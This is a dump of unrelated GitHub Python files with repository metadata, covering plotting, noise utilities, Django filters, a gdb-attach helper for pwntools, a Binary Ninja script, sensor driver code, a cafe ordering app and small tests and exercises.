[datetime.datetime.strptime(d, \"%Y-%m-%d\").date() for d in dates]\n\n # convert the dates to MMM-YYY\n xdate = []\n for d in dates:\n d = d.strftime(\"%b-%y\")\n xdate.append(d)\n dates = xdate\n\n # plot the data\n # as this is a stacked graph first we need to zip the arrays for the\n # bottom statement\n cumulative_number_histogram = [\n a + b for a, b in zip(agreed_variation_no, submitted_variation_no)\n ]\n\n # plot the bars\n agreed_variation_no_histogram = ax.bar(\n bins,\n agreed_variation_no,\n width=width_of_date,\n color=tableau20[5],\n align=\"edge\",\n label=\"Agreed\",\n )\n\n submitted_variation_no_histogram = ax.bar(\n bins,\n submitted_variation_no,\n bottom=agreed_variation_no,\n width=width_of_date,\n color=tableau20[15],\n align=\"edge\",\n label=\"Submitted\",\n )\n\n budget_variation_no_histogram = ax.bar(\n bins,\n budget_variation_no,\n bottom=cumulative_number_histogram,\n width=width_of_date,\n color=tableau20[11],\n align=\"edge\",\n label=\"Budget\",\n )\n\n # set the y axis label\n ylabel = \"No of Variations\\n\"\n ax.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n\n # set the title of the graph\n title = project_name[0] + \" (\" + project_number[0] + \")\\n\"\n ax.set_title(title, fontsize=16, ha=\"center\")\n\n # plot the data\n # first set the width of the bins for side by side bar chart\n width_of_date = 0.3\n cumulative_bin = [x + width_of_date for x in bins]\n cumulative_bin_2 = [x + (2 * width_of_date) for x in bins]\n\n # plot the bars\n agreed_variation_value_histogram = ax2.bar(\n bins,\n agreed_variation_value,\n width=width_of_date,\n color=tableau20[5],\n align=\"edge\",\n label=\"Agreed\",\n )\n\n submitted_variation_value_histogram = ax2.bar(\n cumulative_bin,\n submitted_variation_value,\n width=width_of_date,\n color=tableau20[15],\n align=\"edge\",\n label=\"Submitted\",\n )\n\n budget_variation_value_histogram = ax2.bar(\n cumulative_bin_2,\n budget_variation_value,\n width=width_of_date,\n color=tableau20[11],\n align=\"edge\",\n label=\"Budget\",\n )\n\n # set the y axis label\n ylabel = \"Value of Variations\\n(\\xA3k)\"\n ax2.set_ylabel(ylabel, fontsize=14, rotation=\"vertical\")\n\n # set the x axis label\n ax2.set_xticks(cumulative_bin)\n ax2.set_xticklabels(dates)\n plt.gcf().autofmt_xdate()\n\n # add the legend\n # shrink the axis height by 10% at the bottom\n box = ax2.get_position()\n ax2.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9])\n\n # combine ax1 and ax2 labels\n lines, labels = ax.get_legend_handles_labels()\n\n # place the legend below the axis\n ax2.legend(\n lines,\n labels,\n loc=\"upper center\",\n fontsize=10,\n bbox_to_anchor=(0.5, -0.35),\n fancybox=True,\n shadow=True,\n ncol=5,\n )\n\n # plot the graph and save\n # plt.show()\n save_path = Path(output_directory, project_number[0] + \" variations graph.png\")\n plt.savefig(Path(save_path), bbox_inches=\"tight\")\n plt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n plot_graphs(\"./../london/londonwipdata.sqlite\", \"./../london/graphs/\")\n","repo_name":"ushills/WIP","sub_path":"modules/multigraph.py","file_name":"multigraph.py","file_ext":"py","file_size_in_byte":16753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24808308311","text":"from typing import List\nimport math\n\nfrom opensimplex import OpenSimplex\n\n\ndef constrain(n: int, low: int, high: int) -> int:\n \"\"\"\n Constrains a value between a minimum and maximum value.\n \"\"\"\n return max(min(n, high), low)\n\n\ndef remap(\n n: int, start1: int, stop1: int, start2: int, stop2: int, withinBounds: bool = True\n) -> int:\n \"\"\"\n Re-maps a number from one range to another.\n \"\"\"\n newval = (n - start1) / (stop1 - start1) * (stop2 - start2) + start2\n if not withinBounds:\n return newval\n if start2 < stop2:\n return constrain(newval, start2, stop2)\n else:\n return constrain(newval, stop2, start2)\n\n\ndef generate_noise(\n cx: int, cy: int, angle: int, diameter: int, tmp: OpenSimplex, minimum: int = -1, maximum: int = 1\n) -> int:\n \"\"\"\n 2-dimensional gradient noise function\n \"\"\"\n\n xoff = remap(math.cos(angle), -1, 1, cx, cx + diameter)\n yoff = remap(math.sin(angle), -1, 1, cy, cy + diameter)\n r = tmp.noise2d(x=xoff, y=yoff)\n return remap(r, -1, 1, minimum, maximum)\n\n\ndef random_noise_sample(\n size: int,\n cxs: List[int],\n cys: List[int],\n angle: int,\n diameter: int,\n tmp: OpenSimplex,\n minimum: int = -1,\n maximum: int = 1\n) -> List[float]:\n \"\"\"\n Create a random sample of noise\n \"\"\"\n assert len(cxs) == size\n assert len(cys) == size\n\n sample = []\n for i in range(size):\n sample.append(generate_noise(cxs[i], cys[i], angle, diameter, tmp, minimum, maximum))\n \n return sample\n","repo_name":"jmaldon1/StyleGAN-Landscape-latent-space-walk-example","sub_path":"art_generation/math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28188379387","text":"import django_filters\nfrom django_filters import DateFilter, CharFilter\nfrom .models import *\n\n# https://django-filter.readthedocs.io/en/master/\n\nclass OrderFilter(django_filters.FilterSet):\n\tstart_date = DateFilter(field_name = 'date_created', lookup_expr='gte')\n\tend_date = DateFilter(field_name = 'date_created', lookup_expr='gte')\n\tstatus = CharFilter(field_name = 'status', lookup_expr='icontains')\n\tclass Meta:\n\t\tmodel = Order\n\t\tfields = '__all__'\n\t\t# fields = ['product', 'status']\n\t\texclude = ['date_created', 'customer']","repo_name":"sannjayy/django-basic-crm","sub_path":"accounts/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3179976717","text":"from pwn import *\n\ndef attach_dbg(io,brk_pts=[],syms={},init_cmd=''):\n context.log_level='debug'\n context.terminal=['tmux','splitw','-h']\n \n elf_base=io.libs()[io.cwd+io.argv[0].strip('.')]\n\n cmd = ['b *'+hex(each+elf_base) for each in brk_pts] \\\n + ['set $'+sym+'='+str(syms[sym]+elf_base) for sym in syms]\n\n cmd='\\n'.join(cmd)+'\\n'\n cmd += init_cmd\n print(cmd)\n gdb.attach(io,cmd)\n\n\n\ndef testing():\n io=process(\"./babyheap\")\n p_attach_dbg(io,[0x102,0x200,0x2000])\n io.interactive()\n\n\nif __name__=='__main__':\n testing()","repo_name":"primelyw/Pwning","sub_path":"tools/primedbg.py","file_name":"primedbg.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8652698245","text":"import feature_generation as fg\nimport classification as clf\nimport pandas as pd\nimport click\n\n@click.command()\n#@click.option('--img_ext', default=\".png\", help=\"Image extension\")\n@click.option('--pairs_file', default=\"\", help=\"file containing signature image pairs\")\n@click.option('--features_file', default=\"\", help=\"indicates if already have a features file generated, '' means that the features file needs to be generated\")\n@click.option('--base_datasets_dir', default=\"\", help=\"base directory for the dataset being processed\")\n@click.option('--save_classifier', is_flag=True)\n@click.option('--clf_name', default=\"\", help=\"name to save the classifier\")\n@click.option('--dataset', default=\"CEDAR\", type=click.Choice(['CEDAR', 'Bengali', 'Hindi', 'MCYT', 'GPDS'], case_sensitive=True), help=\"Which dataset has to be used for training\")\n@click.option('--logfile', default=\"\", help=\"File where training log will be saved\")\n@click.option('--cross_val', is_flag=True)\ndef main(pairs_file, features_file, base_datasets_dir, save_classifier, clf_name, dataset, logfile, cross_val):\n\tclf.train(dataset, pairs_file, base_datasets_dir, features_file, save_classifier, clf_name, logfile, cross_val)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"ehuarotop/versigoff","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20519550026","text":"from graphene import ObjectType, String, Field, Schema, Dynamic\n\nclass Person(ObjectType):\n first_name = String(default_value=\"Leia\")\n last_name = String(default_value=\"Skywalker\")\n full_name = String()\n #See the following issue for the fix below https://github.com/graphql-python/graphene/issues/110, answer by sanfilippopablo\n sibling = Field(lambda: Person)\n\n def resolve_full_name(parent, info):\n return f\"{parent.first_name} {parent.last_name}\"\n \n def resolve_sibling(parent,info):\n if parent.first_name == \"Luke\":\n return Person(first_name = \"Leia\", last_name=parent.last_name)\n else:\n return Person(first_name = \"Luke\", last_name=parent.last_name)\n\n\nclass Query(ObjectType):\n me = Field(Person)\n\n def resolve_me(parent, info):\n # returns an object that represents a Person\n return Person(first_name=\"Leia\",last_name=\"Skywalker\")\n\nschema = Schema(query=Query)\n\nquery_string = \"{ me{fullName sibling {fullName sibling {fullName}}} }\"\nresult = schema.execute(query_string)\n\n#Test that my siblings sibling is me.\nassert result.data[\"me\"][\"fullName\"] == result.data[\"me\"][\"sibling\"][\"sibling\"][\"fullName\"]","repo_name":"patello/graphene-tests","sub_path":"infinite_depth.py","file_name":"infinite_depth.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28909019808","text":"# 剑指 Offer 58 - I. 翻转单词顺序\n# 输入一个英文句子,翻转句子中单词的顺序,但单词内字符的顺序不变。为简单起见,标点符号和普通字母一样处理。例如输入字符串\"I am a student. \",则输出\"student. a am I\"。\n\n\n# 示例 1:\n\n# 输入: \"the sky is blue\"\n# 输出: \"blue is sky the\"\n# 示例 2:\n\n# 输入: \" hello world! \"\n# 输出: \"world! hello\"\n# 解释: 输入字符串可以在前面或者后面包含多余的空格,但是反转后的字符不能包括。\n# 示例 3:\n\n# 输入: \"a good example\"\n# 输出: \"example good a\"\n# 解释: 如果两个单词间有多余的空格,将反转后单词间的空格减少到只含一个。\n\n\n# 说明:\n\n# 无空格字符构成一个单词。\n# 输入字符串可以在前面或者后面包含多余的空格,但是反转后的字符不能包括。\n# 如果两个单词间有多余的空格,将反转后单词间的空格减少到只含一个。\n\n\nclass Solution:\n # def reverseWords(self, s: str) -> str:\n # return \" \".join(reversed(s.strip().split()))\n\n def reverseWords(self, s: str) -> str:\n words = []\n start_position = len(s) - 1\n while True:\n while start_position >= 0 and s[start_position] == \" \":\n start_position -= 1\n if start_position < 0:\n break\n end_position = start_position\n while start_position >= 0 and s[start_position] != \" \":\n start_position -= 1\n words.append(s[start_position + 1 : end_position + 1])\n return \" \".join(words)\n\n\nif __name__ == \"__main__\":\n s = Solution()\n assert s.reverseWords(\"the sky is blue\") == \"blue is sky the\"\n assert s.reverseWords(\" hello world! \") == \"world! hello\"\n assert s.reverseWords(\"a good example\") == \"example good a\"\n assert s.reverseWords(\"\") == \"\"\n assert s.reverseWords(\" \") == \"\"\n","repo_name":"wsgggws/leetcode","sub_path":"sword-means-offer/offer_58_i.py","file_name":"offer_58_i.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"43268220887","text":"from .base_enum import ExtendedEnum, ExtendedIntEnum\n\n\nclass SignedAlgorithm(ExtendedEnum):\n \"\"\"This enum provides the list of Signed Algorithm supported by Dynamic API.\"\"\"\n\n HS256 = 'HS256'\n HS384 = 'HS384'\n HS512 = 'HS512'\n RS256 = 'RS256'\n RS384 = 'RS384'\n RS512 = 'RS512'\n ES256 = 'ES256'\n ES384 = 'ES384'\n ES512 = 'ES512'\n PS256 = 'PS256'\n PS384 = 'PS384'\n PS512 = 'PS512'\n\n\nclass EncryptedAlgorithm(ExtendedEnum):\n \"\"\"This enum provides the list of Encrypted Algorithm supported by Dynamic API.\"\"\"\n\n RSA1_5 = 'RSA1_5'\n RSA_OAEP = 'RSA-OAEP'\n\n\nclass EncryptedEncoding(ExtendedEnum):\n \"\"\"This enum provides the list of Encrypted Encoding supported by Dynamic API.\"\"\"\n\n A256GCM = 'A256GCM'\n A256CBC_PLUS_HS512 = 'A256CBC+HS512'\n A192GCM = 'A192GCM'\n A128GCM = 'A128GCM'\n A128CBC_HS256 = 'A128CBC-HS256'\n A192CBC_HS384 = 'A192CBC-HS384'\n A256CBC_HS512 = 'A256CBC-HS512'\n A128CBC_PLUS_HS256 = 'A128CBC+HS256'\n\n\nclass SigningEncryptionType(ExtendedIntEnum):\n \"\"\"This enum provides the list of Signing and Encryption type.\"\"\"\n\n SignedJWT = 1, 'Signed JWT'\n SecureJWT = 2, 'Secure JWT'\n","repo_name":"bcgov/BCSC-SS","sub_path":"selfservice-api/src/selfservice_api/models/enums/technical.py","file_name":"technical.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28302922364","text":"\"\"\"\nBinary Nijnja sometimes doesn't parse the full Load Config Directory Table for CFG compiled PE files.\nIssue filed here : https://github.com/Vector35/binaryninja-api/issues/1542\n\n# Parse PE header, find load config directory table\n# Parse CFG structure from lcdt and find cfg function table VA and size\n# Create a list of functions from CFG RVAs\n\n\"\"\"\n\n\ndef parse_data_view(structure, address):\n PE = StructuredDataView(bv, structure, address)\n return PE\n\n\ndef byte_swap(i):\n i = str(i).replace(\" \", \"\")\n temp = int(i, 16)\n return struct.unpack(\"I\", temp))[0]\n\n\nlcte = parse_data_view(\"PE_Data_Directory_Entry\", (bv.start + 0x1c8))\nlcte_virtualAddress = byte_swap(lcte.virtualAddress) # RVA\nlcte_size = byte_swap(lcte.size)\nlcte_virtualAddress = lcte_virtualAddress + bv.start\nGuardCFFunctionTable_offset = bv.types[\"SIZE_T\"].width * 4 # 16/32\nGuardCFFunctionTable = parse_data_view(\n \"PE_Data_Directory_Entry\",\n (lcte_virtualAddress + lcte_size + GuardCFFunctionTable_offset))\nGuardCFFunctionTable_virtualAddress = byte_swap(\n GuardCFFunctionTable.virtualAddress) # RVA\nGuardCFFunctionTable_size = byte_swap(GuardCFFunctionTable.size)\n\nbr = BinaryReader(bv)\nbr.offset = (GuardCFFunctionTable_virtualAddress)\n\nCFG_funcs = []\nfor i in range(0, GuardCFFunctionTable_size):\n CFG_RVA = br.read32le()\n CFG_byte = br.read8()\n CFG_funcs.append(bv.get_function_at(bv.start + CFG_RVA).symbol.full_name)\n\n# set comment at each RVA to the corresponding function's full name\n# for i in range(0,len(CFG_funcs)):\n# bv.set_comment_at(GuardCFFunctionTable_virtualAddress + i*5,CFG_funcs[i])\n","repo_name":"rohitwas/binja_scripts","sub_path":"CFG_helper.py","file_name":"CFG_helper.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10327010910","text":"\"\"\"Convert COMBINE-AF SAS input files to Feather for faster loading.\"\"\"\n\nimport os\n\nimport pandas as pd\n\nfrom warfarin.data.utils import decode\n\n\ndef main(args):\n df = pd.read_sas(args.input_filename, format=\"sas7bdat\")\n df = decode(df)\n df.to_feather(args.output_filename)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--input_filename\",\n type=str,\n required=True,\n help=\"Path to input SAS (.sas7bdat) file\"\n )\n parser.add_argument(\n \"--output_filename\",\n type=str,\n required=True,\n help=\"Path to output Feather (.feather) file\"\n )\n parsed_args = parser.parse_args()\n\n main(parsed_args)\n","repo_name":"hamilton-health-sciences/warfarin","sub_path":"scripts/convert_sas_to_feather.py","file_name":"convert_sas_to_feather.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21436153896","text":"from __future__ import annotations\n\nimport shlex\nimport subprocess\nimport sys\nfrom io import StringIO\nfrom pathlib import Path\n\nroot_dir = Path(__file__).parent.parent.resolve()\nsys.path.insert(0, root_dir)\n\n# Compromise since isort does not respect noqa\nfrom fortls.jsonrpc import path_to_uri # noqa: E402, F401\nfrom fortls.jsonrpc import read_rpc_messages # noqa: E402\nfrom fortls.jsonrpc import write_rpc_notification # noqa: E402, F401\nfrom fortls.jsonrpc import write_rpc_request # noqa: E402, F401\n\ntest_dir = root_dir / \"test\" / \"test_source\"\n\n\ndef check_post_msg(result: dict, msg: str, severity: int):\n assert result[\"type\"] == severity\n assert result[\"message\"] == msg\n\n\ndef run_request(request, fortls_args: list[str] = None):\n command = [\n sys.executable,\n \"-m\",\n \"fortls\",\n \"--incremental_sync\",\n ]\n if fortls_args:\n # Input args might not be sanitised, fix that\n for i in fortls_args:\n command.extend(shlex.split(i, posix=False))\n\n pid = subprocess.Popen(\n command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n results = pid.communicate(input=request.encode())\n tmp_file = StringIO(results[0].decode())\n results = read_rpc_messages(tmp_file)\n parsed_results = []\n for result in results:\n try:\n parsed_results.append(result[\"result\"])\n except KeyError:\n try:\n # Present in `method`s\n parsed_results.append(result[\"params\"])\n except:\n raise RuntimeError(\n \"Only 'result' and 'params' keys have been implemented for testing.\"\n \" Please add the new key.\"\n )\n except:\n raise RuntimeError(\n \"Unexpected error encountered trying to extract server results\"\n )\n errcode = pid.poll()\n return errcode, parsed_results\n","repo_name":"fortran-lang/fortls","sub_path":"test/setup_tests.py","file_name":"setup_tests.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"52"} +{"seq_id":"38539421379","text":"import time\nfrom typing import Dict, List, Tuple\nfrom utils import delete_item, get_input_ints, dump_json, print_items, \\\n create_item, validate_phone_number, print_items_formatted, print_dict_formatted\nfrom orders import create_prodids, update_order\nfrom mysqlutils import read_from_db, get_item_query\nfrom mysqlops import orders_result, price_summary\n\n\n\ndef update_product(item_list, my_dict, table_name, connect, item_id, sql_no_sql_update):\n \n \n '''\n This is the function for updating the product\n \n '''\n \n product_index = len(item_list) + 100\n product_index = int(input('Input:Index Value that you want updated?'))\n \n while product_index > len(item_list):\n \n product_index = int(input('Input: Correct index value, please ?'))\n \n #new_prod = input(input_string)\n item_list[product_index] = my_dict\n if table_name is None: \n return product_index\n sql_no_sql_update(table_name, my_dict, product_index, item_id, connect) #updating a prod or courier row in the sql /cafe database now\n prod_courier_table = read_from_db(get_item_query(table_name), connect)\n print(\"The appended list: \")\n print_items_formatted (prod_courier_table)\n return product_index\n\n \n \n \ndef get_main_menu(): \n \n \"\"\" \n This function displays the menu options from the end user. This could be either 0 or 1\n 0 is for exiting out of the application and\n 1 is for getting the list of products\n 2 is for getting the list of couriers\n 3 if for getting the list of orders\n \n \"\"\"\n \n print(\"Select your option from the following:\")\n my_dict = {0:\"Exit out of the application\", 1: \"Menu options\", \n 2: \"Delivery options\", 3: \"Order options\"}\n headers = [\"Option\", \"Action\"]\n print_dict_formatted(headers, my_dict)\n user_option = get_input_ints(3)\n return user_option\n\ndef get_item_menu(user_selection: str):\n \n \"\"\"\n This function displays the product options\n \n \"\"\"\n \n # print(\"You are now in the \" + user_selection + \" menu\\n\")\n # print(\"Please read the below possible options\\n\\n\")\n # print(\"Select 0 to return to the main menu \\n OR\")\n # print(\"Select 1 to print the \" + user_selection + \"s list \\n OR\")\n # print(\"Select 2 to create new \" + user_selection + \" \\n OR\")\n my_dict = {0:\"Return to the main menu\", \n 1: \"Print the \" + user_selection + \"s list\", \n 2: \"Create new \" + user_selection}\n headers = [\"Option\", \"Action\"]\n \n \n if user_selection != \"order\":\n \n # print(\"Select 3 to update an existing \" + user_selection + \" \\n OR\")\n # print(\"Select 4 to delete an existing \" + user_selection + \" \\n OR\")\n my_dict.update({3: \"Update an existing \" + user_selection})\n my_dict.update({4: \"Delete an existing \" + user_selection})\n while_range = 4\n \n else:\n \n # print(\"Select 3 to update an existing \" + user_selection + \" status\" + \" \\n OR\")\n # print(\"Select 4 to update an existing \" + user_selection + \" content\" + \" \\n OR\")\n # print(\"Select 5 to delete an existing \" + user_selection + \" \\n OR\")\n my_dict.update({3: \"Update an existing \" + user_selection})\n my_dict.update({4: \"Delete an existing \" + user_selection})\n while_range = 4\n \n print_dict_formatted(headers, my_dict)\n crud_option = get_input_ints(while_range)\n return crud_option\n\n\ndef get_main_menu_opts(main_option: int, prod_list: List[Dict], couriers_list: List[Dict], \n orders_dictlist: List[Dict], dump_json_sql, *sql_nosql_inputs):\n \n \n \"\"\"\n This has the main menu options. Note the recursive call.\n \n \"\"\"\n \n if main_option == 0:\n \n print(\"The application will now exit. Exiting application...\")\n time.sleep(2)\n exit()\n \n elif main_option == 1:\n \n return \"product\", \"price\", prod_list\n \n elif main_option == 2:\n \n return \"courier\", \"phone number\", couriers_list\n \n elif main_option == 3:\n \n return \"order\", orders_dictlist\n \n else:\n \n main_option = print('Input either 0 or 1 or 2 or 3 as advised above:')\n main_option = get_input_ints(3)\n get_main_menu_opts(main_option, prod_list, couriers_list, orders_dictlist)\n \n \ndef get_item_menu_opts(crud_option: int, item_opts_possible: Tuple, connect, main_menu_selection, \n sql_no_sql_create, sql_no_sql_update, sql_no_sql_delete, cafe_database, sql_no_sql_crt_order, price_summary_orders):\n \n \n \"\"\"\n This function has the CRUD operations. That is, either: \n \n 1) We read from the database and print outputs (Read)\n 2) We create soemthing new in the database (create either a product or courier or an order)\n 3) We update the database (either a product, courier or order)\n 4) We delete an objbect from the database (product, courier or an order)\n \n Notice the recursive call\n \n \"\"\"\n \n \n if crud_option == 0:\n \n user_option = get_main_menu()\n main_option = get_main_menu_opts(user_option)\n crud_option = get_item_menu(main_option)\n #get_item_menu_opts(crud_option, item_opts_possible, prod_list, courier_list, orders_dictlist, order_statuslist)\n get_item_menu_opts(crud_option, item_opts_possible, connect, main_menu_selection)\n \n elif crud_option == 1 and item_opts_possible[0] == \"order\": # reading from the database (sql or no sql)\n \n print(\"Getting your \" + item_opts_possible[0] + \" list....Hold on!\")\n time.sleep(2)\n print_items_formatted(item_opts_possible[-1])\n print_items_formatted(price_summary_orders)\n \n elif crud_option == 1:\n \n print(\"Getting your \" + item_opts_possible[0] + \" list....Hold on!\")\n time.sleep(2)\n print_items_formatted(item_opts_possible[-1])\n \n \n elif crud_option == 2 and item_opts_possible[0] == \"product\": # creating a new product in the database\n \n _ = create_product_courier(item_opts_possible, \"prod_name\", \"prod_price\", \"products\", connect, sql_no_sql_create)\n \n elif crud_option == 2 and item_opts_possible[0] == \"courier\": # creating a new courier in the database\n \n _ = create_product_courier(item_opts_possible, \"driver_name\", \"driver_phone\", \"couriers\", connect, sql_no_sql_create)\n \n elif crud_option == 3 and item_opts_possible[0] == \"product\": # updating the product database\n \n _ = create_product_courier(item_opts_possible, \"prod_name\", \"prod_price\", None, connect, sql_no_sql_create) \n _ = update_product(item_opts_possible[-1], my_dict, \"products\", connect, \"prod_id\", sql_no_sql_update)\n\n \n elif crud_option == 3 and item_opts_possible[0] == \"courier\": # updating the courier database\n \n my_dict = create_product_courier(item_opts_possible, \"driver_name\", \"driver_phone\", None, connect, sql_no_sql_create)\n _ = update_product(item_opts_possible[-1], my_dict, \"couriers\", connect, \"driver_id\", sql_no_sql_update)\n \n \n elif crud_option == 4 and item_opts_possible[0] != \"order\": # deleting from the database\n mapped_dict = {\"product\": \"prod_id\", \"courier\": \"driver_id\", }\n table_name = item_opts_possible[0] + \"s\"\n _ = delete_item(item_opts_possible[-1], sql_no_sql_delete, table_name, mapped_dict[item_opts_possible[0]], connect)\n prod_courier_table = read_from_db(get_item_query(table_name), connect)\n print(\"The updated table: \")\n print_items_formatted (prod_courier_table)\n \n elif crud_option == 4 and item_opts_possible[0] == \"order\": # deleting from the database\n table_name = item_opts_possible[0] + \"s\"\n _ = delete_item(item_opts_possible[-1], sql_no_sql_delete, table_name, \"order_id\", connect)\n user_output_orders = read_from_db(orders_result, connect)\n price_summary_orders = read_from_db(price_summary, connect)\n print_items_formatted(user_output_orders)\n print_items_formatted(price_summary_orders)\n \n \n elif crud_option == 2 and item_opts_possible[0] == \"order\": # creating a new order (one-to-many relationships here)\n \n create_order(item_opts_possible, cafe_database, sql_no_sql_crt_order, connect)\n \n elif crud_option == 3 and item_opts_possible[0] == \"order\": #updating order in the database\n \n print_items(item_opts_possible[-1])\n range_limit = len(item_opts_possible[-1]) - 1\n print(\"You will now have to enter the order number for which you want the status modified\\n\")\n print_items(item_opts_possible[-1])\n user_order_index = get_input_ints(range_limit)\n #range_limit = len(order_statuslist) - 1\n #print_items(order_statuslist)\n print(\"You will now have to enter the status index to which you want the order to be updated to\\n\")\n user_status_index = get_input_ints(range_limit)\n #item_opts_possible[-1][user_order_index]['status'] = order_statuslist[user_status_index]\n dump_json(item_opts_possible[-1], \"data/orders.json\")\n print(\"Appended order details:\\n\")\n print_items(item_opts_possible[-1])\n \n elif crud_option == 3 and item_opts_possible[0] == \"order\": #updating order in the database\n \n print_items(item_opts_possible[-1])\n range_limit = len(item_opts_possible[-1]) - 1\n print(\"You will now have to enter the index coresponding to the order you'd like updated\\n\")\n user_order_index = get_input_ints(range_limit)\n update_order(item_opts_possible[-1][user_order_index], cafe_database[0])\n \n \n else:\n product_option = print('Input index value within the range specified please:')\n product_option = get_input_ints(5)\n #get_item_menu_opts (product_option, prod_list)\n \n \ndef get_status_types():\n \n status_types = [\"Processing\", \"Accepted\", \"Preparing\", \"Ready\", \"Shipped\", \"Delivered\"]\n return status_types\n\n\ndef create_product_courier(item_opts_possible, key_1, key_2, table_name, connect, sql_no_sql_create):\n \n print_items_formatted (item_opts_possible[-1])\n inputted_list = create_item(\"Input: Name of the new \" + item_opts_possible[0] + \" please?\\n\", \\\n \"Input: \" + item_opts_possible[1].capitalize() + \" of the new \" + item_opts_possible[0] + \" please?\\n\")\n prod_name, prod_price = inputted_list\n my_dict = {key_1: prod_name, key_2: prod_price}\n if table_name is None: \n return my_dict\n sql_no_sql_create(my_dict, table_name, \"INSERT\", connect) #creating a prod or courier row in the sql /cafe database now\n prod_courier_table = read_from_db(get_item_query(table_name), connect)\n print(\"The appended list: \")\n print_items_formatted (prod_courier_table)\n return prod_courier_table\n\ndef delete_item(item_list: List, sql_no_sql_delete, table_name, id_name, connect):\n \n \"\"\"\n \n This function deletes a product from a list as defined by the user\n \n \"\"\"\n \n print_items_formatted(item_list) \n index = int(input('Input: Index Value to be deleted?'))\n while index > len(item_list):\n index = int(input('Input: Correct index value to be deleted, please?'))\n \n if (table_name is None):\n del item_list[index]\n return item_list\n sql_no_sql_delete(table_name, id_name, index, connect)\n return item_list\n\ndef create_order(item_opts_possible, cafe_database, process_order, connect):\n \n \n print_items_formatted(item_opts_possible[-1])\n inputted_list = create_item(\"Input: Please enter customer name\\n\", \n \"Input: Please enter customer address\\n\", \n \"Please enter customer phone number\\n\") \n \n customer_name, customer_address, customer_phone= inputted_list\n order_status = 'Preparing'\n customer_phone = validate_phone_number(customer_phone)\n order_items = []\n print(\"Menu of available drinks/food in the cafe\")\n print_items_formatted(cafe_database[0])\n prod_ids = create_prodids(cafe_database[0], order_items)\n my_dict = {\"customer_name\": customer_name, \"customer_address\": customer_address, \n \"customer_phone\": customer_phone, \"status\": order_status, \"items\": prod_ids}\n item_opts_possible[-1].append(my_dict)\n process_order(my_dict, connect)\n print(\"Appended order details:\\n\")\n user_output_orders = read_from_db(orders_result, connect)\n price_summary_orders = read_from_db(price_summary, connect)\n print_items_formatted(user_output_orders)\n print_items_formatted(price_summary_orders)","repo_name":"atanejajlr/week_5_v3","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73142864164","text":"import ustruct\nimport time\n\nclass AM2320:\n BUFFER_SIZE = const(8)\n\n def __init__(self, i2c=None, address=0x5c):\n self.i2c = i2c\n self.address = address\n self.buf = bytearray(self.BUFFER_SIZE)\n\n def measure(self):\n buf = self.buf\n address = self.address\n # wake sensor\n try:\n self.i2c.writeto(address, b'')\n except OSError:\n pass\n # read 4 registers starting at offset 0x00\n self.i2c.writeto(address, b'\\x03\\x00\\x04')\n # wait at least 1.5ms\n time.sleep_ms(2)\n # read data\n self.i2c.readfrom_mem_into(address, 0, buf)\n # print(buf)\n crc = ustruct.unpack('>= 1\n crc ^= 0xA001\n else:\n crc >>= 1\n return crc\n\n def humidity(self):\n return (self.buf[2] << 8 | self.buf[3]) * 0.1\n\n def temperature(self):\n t = ((self.buf[4] & 0x7f) << 8 | self.buf[5]) * 0.1\n if self.buf[4] & 0x80:\n t = -t\n return t\n","repo_name":"jcksnvllxr80/weather-station","sub_path":"am2320.py","file_name":"am2320.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"23889724511","text":"import csv\r\n\r\ndef prune_rows_without_hours(input_csv, output_csv='pruned.csv'):\r\n with open(input_csv, 'r') as infile, open(output_csv, 'w', newline='') as outfile:\r\n reader = csv.reader(infile)\r\n writer = csv.writer(outfile)\r\n\r\n # Write the header to the output CSV\r\n header = next(reader)\r\n writer.writerow(header)\r\n\r\n for row in reader:\r\n # Check if the row contains numeric values in columns representing hours\r\n if any(field.replace(',', '').replace('.', '').isdigit() for field in row[2:]):\r\n # Write the row to the output CSV\r\n writer.writerow(row)\r\n\r\n print(f\"Pruned CSV saved to {output_csv}\")\r\n\r\nif __name__ == \"__main__\":\r\n # Replace 'input.csv' with the path to your CSV file\r\n input_csv = './_table_1.csv'\r\n \r\n # Call the function with only the input CSV file, output_csv will default to 'pruned.csv'\r\n 